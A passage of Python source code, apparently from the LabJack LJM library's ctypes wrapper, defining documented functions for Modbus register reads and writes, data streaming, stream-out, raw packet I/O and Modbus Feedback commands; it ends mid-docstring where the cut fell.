def eWriteNames(handle, numFrames, aNames, aValues):
"""Performs Modbus operations that writes values to a device.
Args:
handle: A valid handle to an open device.
numFrames: The total number of writes to perform.
aNames: List of names (strings) to write. This list needs to be
at least size numFrames.
aValues: List of values to write. This list needs to be at least
size numFrames.
Raises:
TypeError: aNames is not a list of strings.
LJMError: An error was returned from the LJM library call.
"""
cNumFrames = ctypes.c_int32(numFrames)
asciiNames = []
for x in aNames:
if not isinstance(x, str):
raise TypeError("Expected a string list but found an item " + str(type(x)) + ".")
asciiNames.append(x.encode("ascii"))
cNames = _convertListToCtypeArray(asciiNames, ctypes.c_char_p)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eWriteNames(handle, cNumFrames, ctypes.byref(cNames), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
def eReadAddressArray(handle, address, dataType, numValues):
"""Performs Modbus operations that reads values from a device.
Args:
handle: A valid handle to an open device.
address: The address to read an array from.
dataType: The data type of address.
numValues: The size of the array to read.
Returns:
A list of size numValues with the read values.
Raises:
LJMError: An error was returned from the LJM library call.
Note:
If numValues is large enough, this functions will automatically
split reads into multiple packets based on the current device's
effective data packet size. Using both non-buffer and buffer
registers in one function call is not supported.
"""
cAddr = ctypes.c_int32(address)
cType = ctypes.c_int32(dataType)
cNumVals = ctypes.c_int32(numValues)
cVals = (ctypes.c_double*numValues)()
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eReadAddressArray(handle, cAddr, cType, cNumVals, ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cVals)
def eReadNameArray(handle, name, numValues):
"""Performs Modbus operations that reads values from a device.
Args:
handle: A valid handle to an open device.
name: The register name to read an array from.
numValues: The size of the array to read.
Returns:
A list of size numValues with the read values.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
Note:
If numValues is large enough, this functions will automatically
split reads into multiple packets based on the current device's
effective data packet size. Using both non-buffer and buffer
registers in one function call is not supported.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cNumVals = ctypes.c_int32(numValues)
cVals = (ctypes.c_double*numValues)()
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eReadNameArray(handle, name.encode("ascii"), cNumVals, ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cVals)
def eWriteAddressArray(handle, address, dataType, numValues, aValues):
"""Performs Modbus operations that writes values to a device.
Args:
handle: A valid handle to an open device.
address: The address to write an array to.
dataType: The data type of address.
numValues: The size of the array to write.
aValues: List of values to write. This list needs to be at least
size numValues.
Raises:
LJMError: An error was returned from the LJM library call.
Note:
If numValues is large enough, this functions will automatically
split writes into multiple packets based on the current
device's effective data packet size. Using both non-buffer and
buffer registers in one function call is not supported.
"""
cAddr = ctypes.c_int32(address)
cType = ctypes.c_int32(dataType)
cNumVals = ctypes.c_int32(numValues)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eWriteAddressArray(handle, cAddr, cType, cNumVals, ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
def eWriteNameArray(handle, name, numValues, aValues):
"""Performs Modbus operations that writes values to a device.
Args:
handle: A valid handle to an open device.
name: The register name to write an array to.
numValues: The size of the array to write.
aValues: List of values to write. This list needs to be at least
size numValues.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
Note:
If numValues is large enough, this functions will automatically
split writes into multiple packets based on the current
device's effective data packet size. Using both non-buffer and
buffer registers in one function call is not supported.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cNumVals = ctypes.c_int32(numValues)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eWriteNameArray(handle, name.encode("ascii"), cNumVals, ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
def eReadAddressByteArray(handle, address, numBytes):
"""Performs a Modbus operation to read a byte array.
Args:
handle: A valid handle to an open device.
address: The address to read an array from.
numBytes: The size of the byte array to read.
Returns:
A list of size numBytes with the read byte values.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
This function will append a 0x00 byte to aBytes for
odd-numbered numBytes.
If numBytes is large enough, this functions will automatically
split reads into multiple packets based on the current device's
effective data packet size. Using both non-buffer and buffer
registers in one function call is not supported.
"""
cAddr = ctypes.c_int32(address)
cNumBytes = ctypes.c_int32(numBytes)
cBytes = (ctypes.c_ubyte*numBytes)()
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eReadAddressByteArray(handle, cAddr, cNumBytes, ctypes.byref(cBytes), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cBytes)
def eReadNameByteArray(handle, name, numBytes):
"""Performs a Modbus operation to read a byte array.
Args:
handle: A valid handle to an open device.
name: The register name to read an array from.
numBytes: The size of the byte array to read.
Returns:
A list of size numBytes with the read byte values.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
Notes:
This function will append a 0x00 byte to aBytes for
odd-numbered numBytes.
If numBytes is large enough, this functions will automatically
split reads into multiple packets based on the current device's
effective data packet size. Using both non-buffer and buffer
registers in one function call is not supported.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cNumBytes = ctypes.c_int32(numBytes)
cBytes = (ctypes.c_ubyte*numBytes)()
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eReadNameByteArray(handle, name.encode("ascii"), cNumBytes, ctypes.byref(cBytes), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cBytes)
def eWriteAddressByteArray(handle, address, numBytes, aBytes):
"""Performs a Modbus operation to write a byte array.
Args:
handle: A valid handle to an open device.
address: The register address to write a byte array to.
numBytes: The size of the byte array to write.
aBytes: List of byte values to write. This list needs to be at
least size numBytes.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
This function will append a 0x00 byte to aBytes for
odd-numbered numBytes.
If numBytes is large enough, this functions will automatically
split writes into multiple packets based on the current
device's effective data packet size. Using both non-buffer and
buffer registers in one function call is not supported.
"""
cAddr = ctypes.c_int32(address)
cNumBytes = ctypes.c_int32(numBytes)
aBytes = _coerceToByteArrayIfString(aBytes)
cBytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eWriteAddressByteArray(handle, cAddr, cNumBytes, ctypes.byref(cBytes), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
def eWriteNameByteArray(handle, name, numBytes, aBytes):
"""Performs a Modbus operation to write a byte array.
Args:
handle: A valid handle to an open device.
name: The register name to write an array to.
numBytes: The size of the byte array to write.
aBytes: List of byte values to write. This list needs to be at
least size numBytes.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
Notes:
This function will append a 0x00 byte to aBytes for
odd-numbered numBytes.
If numBytes is large enough, this functions will automatically
split writes into multiple packets based on the current
device's effective data packet size. Using both non-buffer and
buffer registers in one function call is not supported.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cNumBytes = ctypes.c_int32(numBytes)
aBytes = _coerceToByteArrayIfString(aBytes)
cBytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eWriteNameByteArray(handle, name.encode("ascii"), cNumBytes, ctypes.byref(cBytes), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
def eAddresses(handle, numFrames, aAddresses, aDataTypes, aWrites, aNumValues, aValues):
"""Performs Modbus operations that reads/writes values to a device.
Args:
handle: A valid handle to an open device.
numFrames: The total number of reads/writes to perform.
aAddresses: List of addresses to write. This list needs to be at
least size numFrames.
aDataTypes: List of data types corresponding to aAddresses
(labjack.ljm.constants.FLOAT32, labjack.ljm.constants.INT32,
etc.). This list needs to be at least size numFrames.
aWrites: List of directions (labjack.ljm.constants.READ or
labjack.ljm.constants.WRITE) corresponding to aAddresses.
This list needs to be at least size numFrames.
aNumValues: List of the number of values to read/write,
corresponding to aWrites and aAddresses. This list needs to
be at least size numFrames.
aValues: List of values to write. This list needs to be the
length of the sum of the aNumValues list's values. Values
corresponding to writes are written.
Returns:
The list of aValues written/read.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
For every entry in aWrites[i] that is
labjack.ljm.constants.WRITE, aValues contains aNumValues[i]
values to write and for every entry in aWrites that is
labjack.ljm.constants.READ, aValues contains aNumValues[i]
values that will be updated in the returned list. aValues values
must be in the same order as the rest of the lists. For example,
if aWrite is:
[labjack.ljm.constants.WRITE, labjack.ljm.constants.READ,
labjack.ljm.constants.WRITE]
and aNumValues is:
[1, 4, 2]
aValues would have one value to be written, then 4 blank/garbage
values, and then 2 values to be written.
"""
cNumFrames = ctypes.c_int32(numFrames)
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eAddresses(handle, cNumFrames, ctypes.byref(cAddrs), ctypes.byref(cTypes), ctypes.byref(cWrites), ctypes.byref(cNumVals), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cVals)
def eNames(handle, numFrames, aNames, aWrites, aNumValues, aValues):
"""Performs Modbus operations that reads/writes values to a device.
Args:
handle: A valid handle to an open device.
numFrames: The total number of reads/writes to perform. This
needs to be the length of aNames/aWrites/aNumValues or less.
aNames: List of names (strings) to write/read. This list needs
to be at least size numFrames.
aWrites: List of directions (labjack.ljm.constants.READ or
labjack.ljm.constants.WRITE) corresponding to aNames. This
list needs to be at least size numFrames.
aNumValues: List of the number of values to read/write,
corresponding to aWrites and aNames. This list needs to be
at least size numFrames.
aValues: List of values to write. This list needs to be the
length of the sum of the aNumValues list's values. Values
corresponding to writes are written.
Returns:
The list of aValues written/read.
Raises:
TypeError: aNames is not a list of strings.
LJMError: An error was returned from the LJM library call.
Notes:
For every entry in aWrites[i] that is
labjack.ljm.constants.WRITE, aValues contains aNumValues[i]
values to write and for every entry in aWrites that is
labjack.ljm.constants.READ, aValues contains aNumValues[i]
values that will be updated in the returned list. aValues values
must be in the same order as the rest of the lists. For example,
if aWrite is:
[labjack.ljm.constants.WRITE, labjack.ljm.constants.READ,
labjack.ljm.constants.WRITE]
and aNumValues is:
[1, 4, 2]
aValues would have one value to be written, then 4 blank/garbage
values, and then 2 values to be written.
"""
cNumFrames = ctypes.c_int32(numFrames)
asciiNames = []
for x in aNames:
if not isinstance(x, str):
raise TypeError("Expected a string list but found an item " + str(type(x)) + ".")
asciiNames.append(x.encode("ascii"))
cNames = _convertListToCtypeArray(asciiNames, ctypes.c_char_p)
cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_eNames(handle, cNumFrames, ctypes.byref(cNames), ctypes.byref(cWrites), ctypes.byref(cNumVals), ctypes.byref(cVals), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
raise LJMError(error, cErrorAddr.value)
return _convertCtypeArrayToList(cVals)
def eReadNameString(handle, name):
"""Reads a string from a device.
Args:
handle: A valid handle to an open device.
name: The string name of a register to read.
Returns:
The read string.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
Note: This is a convenience function for eNames.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
outStr = ("\0"*constants.STRING_ALLOCATION_SIZE).encode("ascii")
error = _staticLib.LJM_eReadNameString(handle, name.encode("ascii"), outStr)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _decodeASCII(outStr)
def eReadAddressString(handle, address):
"""Reads a string from a device.
Args:
handle: A valid handle to an open device.
address: The integer address of a register to read.
Returns:
The read string.
Raises:
LJMError: An error was returned from the LJM library call.
Note: This is a convenience function for eNames.
"""
cAddr = ctypes.c_int32(address)
outStr = ("\0"*constants.STRING_ALLOCATION_SIZE).encode("ascii")
error = _staticLib.LJM_eReadAddressString(handle, cAddr, outStr)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _decodeASCII(outStr)
def eWriteNameString(handle, name, string):
"""Writes a string to a device.
Args:
handle: A valid handle to an open device.
name: The string name of a register to write.
string: The string to write.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
Note: This is a convenience function for eNames.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
if not isinstance(string, str):
raise TypeError("Expected a string instead of " + str(type(string)) + ".")
error = _staticLib.LJM_eWriteNameString(handle, name.encode("ascii"), string.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
def eWriteAddressString(handle, address, string):
"""Writes a string to a device.
Args:
handle: A valid handle to an open device.
address: The integer address of a register to write.
string: The string to write.
Raises:
TypeError: string parameter is not a string.
LJMError: An error was returned from the LJM library call.
Note: This is a convenience function for eNames.
"""
cAddr = ctypes.c_int32(address)
if not isinstance(string, str):
raise TypeError("Expected a string instead of " + str(type(string)) + ".")
error = _staticLib.LJM_eWriteAddressString(handle, cAddr, string.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
_g_eStreamDataSize = {}
def eStreamStart(handle, scansPerRead, numAddresses, aScanList, scanRate):
"""Initializes a stream object and begins streaming. This includes
creating a buffer in LJM that collects data from the device.
Args:
handle: A valid handle to an open device.
scansPerRead: Number of scans returned by each call to the
eStreamRead function. This is not tied to the maximum
packet size for the device.
numAddresses: The size of aScanList. The number of addresses to
scan.
aScanList: List of Modbus addresses to collect samples from,
per scan.
scanRate: Sets the desired number of scans per second.
Returns:
The actual scan rate the device will scan at.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
Address configuration such as range, resolution, and
differential voltages must be handled elsewhere.
Check your device's documentation for valid aScanList channels.
"""
cSPR = ctypes.c_int32(scansPerRead)
cNumAddrs = ctypes.c_int32(numAddresses)
cSL_p = _convertListToCtypeArray(aScanList, ctypes.c_int32)
cScanRate = ctypes.c_double(scanRate)
_g_eStreamDataSize[handle] = scansPerRead*numAddresses
error = _staticLib.LJM_eStreamStart(handle, cSPR, cNumAddrs, ctypes.byref(cSL_p), ctypes.byref(cScanRate))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cScanRate.value
def eStreamRead(handle):
"""Returns data from an initialized and running LJM stream buffer.
Waits for data to become available, if necessary.
Args:
handle: A valid handle to an open device.
Returns:
A tuple containing:
(aData, deviceScanBacklog, ljmScanBackLog)
aData: Stream data list with all channels interleaved. It will
contain scansPerRead*numAddresses values configured from
eStreamStart. The data returned is removed from the LJM
stream buffer.
deviceScanBacklog: The number of scans left in the device
buffer, as measured from when data was last collected from
the device. This should usually be near zero and not
growing.
ljmScanBacklog: The number of scans left in the LJM buffer, as
measured from after the data returned from this function is
removed from the LJM buffer. This should usually be near
zero and not growing.
Raises:
LJMError: An error was returned from the LJM library call or
eStreamStart was not called first on the handle and
the aData size cannot be determined.
"""
# May need to change to optimize
if handle not in _g_eStreamDataSize:
raise LJMError(errorString="Streaming has not been started for the given handle. Please call eStreamStart first.")
cData = (ctypes.c_double*_g_eStreamDataSize[handle])()
cD_SBL = ctypes.c_int32(0)
cLJM_SBL = ctypes.c_int32(0)
error = _staticLib.LJM_eStreamRead(handle, ctypes.byref(cData), ctypes.byref(cD_SBL), ctypes.byref(cLJM_SBL))
if error != errorcodes.NOERROR:
raise LJMError(error)
return _convertCtypeArrayToList(cData), cD_SBL.value, cLJM_SBL.value
def setStreamCallback(handle, callback):
"""Sets a callback that is called by LJM when the stream has
collected scansPerRead scans (see eStreamStart) or if an error has
occurred.
Args:
handle: A valid handle to an open device.
callback: The callback function for LJM's stream thread to call
when stream data is ready, which should call
LJM_eStreamRead to acquire data. The handle will be the
single argument of the callback.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
setStreamCallback should be called after eStreamStart.
To disable the previous callback for stream reading, pass 0 or
None as the callback.
setStreamCallback may not be called from within a callback.
callback may not use data stored in `threading.local`.
The handle is passed as the argument to callback because if you
have multiple devices running with setStreamCallback, you might
want to check which handle had stream data ready.
"""
if callback is None or callback == 0:
cbLjm = 0
cbArg = 0
else:
cbData = _StreamCallbackData(handle, callback)
_g_streamCallbackData[handle] = cbData
cbLjm = cbData.callbackLjm
cbArg = cbData.argRef
error = _staticLib.LJM_SetStreamCallback(handle, cbLjm, cbArg)
if error != errorcodes.NOERROR:
raise LJMError(error)
def eStreamStop(handle):
"""Stops the LJM library from streaming any more data from the
device, while leaving any collected data in the LJM library's
buffer to be read. Stops the device from streaming.
Args:
handle: A valid handle to an open device.
Raises:
LJMError: An error was returned from the LJM library call.
"""
if handle in _g_eStreamDataSize:
del _g_eStreamDataSize[handle]
if handle in _g_streamCallbackData:
del _g_streamCallbackData[handle]
error = _staticLib.LJM_eStreamStop(handle)
if error != errorcodes.NOERROR:
raise LJMError(error)
def streamBurst(handle, numAddresses, aScanList, scanRate, numScans):
"""Initializes a stream burst and collects data. This function
combines eStreamStart, eStreamRead, and eStreamStop, as well as
some other device initialization.
Args:
handle: A valid handle to an open device.
numAddresses: The size of aScanList. The number of addresses to
scan.
aScanList: A list of Modbus addresses to collect samples from,
per scan.
scanRate: Sets the desired number of scans per second.
Upon successful return of this function, gets updated to
the actual scan rate that the device scanned at.
numScans: The number of scans to collect. This is how many
burst scans are collected and may not be zero.
Returns:
A tuple containing:
(scanRate, aData)
scanRate: The actual scan rate that the device scanned at.
aData: List of streamed data. Returns all addresses
interleaved. This will hold (numScans * numAddresses)
values.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
Address configuration such as range, resolution, and
differential voltages are handled by writing to the device.
Check your device's documentation for which addresses are valid
for aScanList and how many burst scans may be collected.
This function will block for (numScans / scanRate) seconds or
longer.
"""
cNumAddresses = ctypes.c_int32(numAddresses)
cScanList_p = _convertListToCtypeArray(aScanList, ctypes.c_int32)
cScanRate = ctypes.c_double(scanRate)
cNumScans = ctypes.c_uint32(numScans)
cData = (ctypes.c_double*(numScans*numAddresses))()
error = _staticLib.LJM_StreamBurst(handle, cNumAddresses, ctypes.byref(cScanList_p), ctypes.byref(cScanRate), cNumScans, ctypes.byref(cData))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cScanRate.value, _convertCtypeArrayToList(cData)
def getStreamTCPReceiveBufferStatus(handle):
"""Gets the backlog status of the TCP receive buffer.
Args:
handle: A valid handle to an open device running a TCP based
stream.
Returns:
A tuple containing:
(receiveBufferBytesSize, receiveBufferBytesBacklog)
receiveBufferBytesSize: The current maximum number of bytes
that can be stored in the receive buffer before it is full.
receiveBufferBytesBacklog: The current number of bytes stored
in the receive buffer.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cRecSize = ctypes.c_uint32(0)
cRecBacklog = ctypes.c_uint32(0)
error = _staticLib.LJM_GetStreamTCPReceiveBufferStatus(handle, ctypes.byref(cRecSize), ctypes.byref(cRecBacklog))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cRecSize.value, cRecBacklog.value
def initializeAperiodicStreamOut(handle, streamOutIndex, targetAddr, scanRate):
"""Initializes all device registers necessary to start a aperiodic
stream-out.
Args:
handle: A valid handle to an open device.
streamOutIndex: The index number of this stream-out.
Note: T-series devices support a maximum of 4 stream-outs.
targetAddr: The register to update during stream-out
stored in the receive buffer before it is full.
scanRate: The scan rate that the stream is initialized to.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cStreamIndex = ctypes.c_int32(streamOutIndex)
cTargetAddr = ctypes.c_int32(targetAddr)
cScanRate = ctypes.c_double(scanRate)
error = _staticLib.LJM_InitializeAperiodicStreamOut(handle, cStreamIndex, cTargetAddr, cScanRate)
if error != errorcodes.NOERROR:
raise LJMError(error)
def writeAperiodicStreamOut(handle, streamOutIndex, numValues, aWriteData):
"""Writes data to the buffer of the specified aperiodic stream-out.
Args:
handle: A valid handle to an open device.
streamOutIndex: The index number of this stream-out.
numValues: The number of values to write to the stream-out
buffer.
aWriteData: The data list to be written to the stream-out
Note: the size of the array should be equal to the buffer
size in bytes divided by 4 (BufferNumBytes / 4).
Returns:
LJMBufferStatus: The number of samples that can be written to
the stream-out queue.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cStreamIndex = ctypes.c_int32(streamOutIndex)
cNumValues = ctypes.c_int32(numValues)
cWriteData_p = _convertListToCtypeArray(aWriteData, ctypes.c_double)
cLJMBufferStatus = ctypes.c_int32(0)
error = _staticLib.LJM_WriteAperiodicStreamOut(handle, cStreamIndex, cNumValues, ctypes.byref(cWriteData_p), ctypes.byref(cLJMBufferStatus))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cLJMBufferStatus.value
def periodicStreamOut(handle, streamOutIndex, targetAddr, scanRate, numValues, aWriteData):
"""Initializes all registers necessary to start streaming out a
periodic waveform (looping over the values written to the
function).
Args:
handle: A valid handle to an open device.
streamOutIndex: The index number of this stream-out.
targetAddr: The register to update during stream-out stored in
the receive buffer before it is full.
scanRate: The scan rate that the stream is initialized to.
numValues: The number of values to write to the stream-out
buffer.
aWriteData: The data list to be written to the stream-out
buffer (this should be one period of the waveform).
Raises:
LJMError: An error was returned from the LJM library call.
"""
cStreamIndex = ctypes.c_int32(streamOutIndex)
cTargetAddr = ctypes.c_int32(targetAddr)
cScanRate = ctypes.c_double(scanRate)
cNumValues = ctypes.c_int32(numValues)
cWriteData_p = _convertListToCtypeArray(aWriteData, ctypes.c_double)
error = _staticLib.LJM_PeriodicStreamOut(handle, cStreamIndex, cTargetAddr, cScanRate, cNumValues, ctypes.byref(cWriteData_p))
if error != errorcodes.NOERROR:
raise LJMError(error)
def writeRaw(handle, data, numBytes=None):
"""Sends an unaltered data packet to a device.
Args:
handle: A valid handle to an open device.
data: The byte list/packet to send.
numBytes: The number of bytes to send. Default is None and will
automaticcally send all the bytes in the data list.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cData = _convertListToCtypeArray(data, ctypes.c_ubyte)
if numBytes is None:
numBytes = len(cData)
cNumBytes = ctypes.c_int32(numBytes)
error = _staticLib.LJM_WriteRaw(handle, ctypes.byref(cData), cNumBytes)
if error != errorcodes.NOERROR:
raise LJMError(error)
def readRaw(handle, numBytes):
"""Reads an unaltered data packet from a device.
Args:
handle: A valid handle to an open device.
numBytes: The number of bytes to receive.
Returns:
A list that is the read byte packet. It is length numBytes.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cNumBytes = ctypes.c_int32(numBytes)
cData = (ctypes.c_ubyte*numBytes)()
error = _staticLib.LJM_ReadRaw(handle, ctypes.byref(cData), cNumBytes)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _convertCtypeArrayToList(cData)
def addressesToMBFB(maxBytesPerMBFB, aAddresses, aDataTypes, aWrites, aNumValues, aValues, numFrames, aMBFBCommand=None):
"""Takes in lists that together represent operations to be performed
on a device and returns the numbers of frames created and a byte
list representing a valid Modbus Feedback command.
Args:
maxBytesPerMBFB: The maximum number of bytes that the Feedback
command is allowed to consist of. It is highly recommended
to pass the size of MaxBytesPerMBFB to prevent buffer
overflow.
aAddresses: A list of size numFrames representing the register
addresses to read from or write to for each frame.
aDataTypes: A list of size numFrames representing the data types
to read or write. See the Data Type constants in the
labjack.ljm.constants module.
aWrites: A list of size numFrames of the direction/access
direction/access type (labjack.ljm.constants.READ or
labjack.ljm.constants.WRITE) for each frame.
aNumValues: A list of size numFrames giving the number of values
to read/write for each frame.
aValues: A list of values to write. Needs to be the length of
the sum of the aNumValues list's values. Values
corresponding to writes are written.
numFrames: The number of frames to be created, which should be
the length of aAddresses/aTypes/aWrites/aNumValues or less.
aMBFBCommand: The Feedback command to be passed. This should be
at least the size maxBytesPerMBFB. Default is None, which
creates this list with size maxBytesPerMBFB. Transaction ID
and Unit ID will be blanks that mbfbComm will fill in.
Returns:
A tuple containing:
(numFrames, aMBFBCommand)
numFrames: The number of frames created.
aMBFBCommand: A list representing the Modbus Feedback command.
Raises:
LJMError: An error was returned from the LJM library call.
Notes:
For every entry in aWrites[i] that is
labjack.ljm.constants.WRITE, aValues contains aNumValues[i]
values to write and for every entry in aWrites that is
labjack.ljm.constants.READ, aValues contains aNumValues[i]
values that will later be updated in the updateValues function.
aValues values must be in the same order as the rest of the
lists. For example, if aWrite is:
[labjack.ljm.constants.WRITE, labjack.ljm.constants.READ,
labjack.ljm.constants.WRITE]
and aNumValues is:
[1, 4, 2]
aValues would have one value to be written, then 4 blank/garbage
values, and then 2 values to be written.
"""
cMaxBytes = ctypes.c_int32(maxBytesPerMBFB)
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
cNumFrames = ctypes.c_int32(numFrames)
if aMBFBCommand is None:
cComm = (ctypes.c_ubyte*maxBytesPerMBFB)()
else:
cComm = _convertListToCtypeArray(aMBFBCommand, ctypes.c_ubyte)
error = _staticLib.LJM_AddressesToMBFB(cMaxBytes, ctypes.byref(cAddrs), ctypes.byref(cTypes), ctypes.byref(cWrites), ctypes.byref(cNumVals), ctypes.byref(cVals), ctypes.byref(cNumFrames), ctypes.byref(cComm))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cNumFrames.value, _convertCtypeArrayToList(cComm)
def mbfbComm(handle, unitID, aMBFB):
"""Sends a Modbus Feedback command and receives a Feedback response,
and parses the response for obvious errors. This function adds its
own Transaction ID to the command.
Args:
handle: A valid handle to an open device.
unitID: The ID of the specific unit that the Modbus Feedback
command should be sent to. Primarily used for LabJack Mote
communication.
aMBFB: A list that is the Modbus Feedback command to send. This
must also be a size large enough for the Feedback response.
Return:
A list that is the Modbus Feedback reponse.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cUnitID = ctypes.c_ubyte(unitID)
cMBFB = _convertListToCtypeArray(aMBFB, ctypes.c_ubyte)
cErrorAddr = ctypes.c_int32(-1)
error = _staticLib.LJM_MBFBComm(handle, unitID, ctypes.byref(cMBFB), ctypes.byref(cErrorAddr))
if error != errorcodes.NOERROR:
errAddr = cErrorAddr.value
if errAddr == -1:
errAddr = None
raise LJMError(error, errAddr)
return _convertCtypeArrayToList(cMBFB)
def updateValues(aMBFBResponse, aDataTypes, aWrites, aNumValues, numFrames, aValues=None):
"""Takes a Modbus Feedback response from a device and the lists
corresponding the Feedback command, and returns the converted
response values.
Args:
aDataTypes: The list of data types read/written.
aWrites: The list of read/write directions.
aNumValues: The list of how many values were read/written.
numFrames: The number of frames read/written.
aValues: A list of values to pass. This should be at least the
sum of the values in the aNumValues list. Default is None,
which creates this list with a size of the sum of the values
in the aNumValues list.
Returns:
A list of converted float values from the Modbus Feedback
response.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cMBFB = _convertListToCtypeArray(aMBFBResponse, ctypes.c_ubyte)
cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
cWrites = _convertListToCtypeArray(aWrites, ctypes.c_int32)
cNumVals = _convertListToCtypeArray(aNumValues, ctypes.c_int32)
cNumFrames = ctypes.c_int32(numFrames)
if aValues is None:
cVals = (ctypes.c_double*(sum(aNumValues)))()
else:
cVals = _convertListToCtypeArray(aValues, ctypes.c_double)
error = _staticLib.LJM_UpdateValues(ctypes.byref(cMBFB), ctypes.byref(cTypes), ctypes.byref(cWrites), ctypes.byref(cNumVals), cNumFrames, ctypes.byref(cVals))
if error != errorcodes.NOERROR:
raise LJMError(error)
return _convertCtypeArrayToList(cVals)
def namesToAddresses(numFrames, aNames, aAddresses=None, aDataTypes=None):
"""Takes a list of Modbus register names and returns two lists
containing the corresponding addresses and data types.
Args:
numFrames: The number of names in aNames, and minimum size of
aAddresses and aDataTypes if not set to None.
aNames: List of strings containing the register name or register
alternate name.
aAddresses: List of addresses to pass. This should be at least
the size numFrames. Default is None, which creates this list
